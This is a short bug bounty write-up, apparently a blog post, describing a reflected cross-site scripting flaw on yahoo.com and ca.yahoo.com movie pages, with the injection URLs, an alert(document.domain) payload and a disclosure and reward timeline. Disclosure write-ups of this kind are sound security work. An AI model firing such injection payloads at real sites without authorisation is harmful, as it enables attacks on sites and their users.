XSS in yahoo.com (Reflected)

Hello Guys, This is Shahzada Al Shahriar Khan. Known as TheShahzada.
I am from Bangladesh. And I am Newbie in Bug Bounty. :P
Well, Now I will share how I found Reflected Cross-Site Scripting (XSS) in main & sub domain of Yahoo.

Vulnerable URL:
1. https://www.yahoo.com/movies/film/[*]
2. https://ca.yahoo.com/movies/film/[*]

Payload I Use:

1. https://www.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>
2. https://ca.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>


Yahoo Canada Subdomain

Video PoC:

Aug 12th - I Submitted The Report.
Aug 15th - Triaged The Report & Rewarded Me $300 Initial Bounty.
Aug 16th - Resolved
Aug 24th - $400 Bounty Rewarded.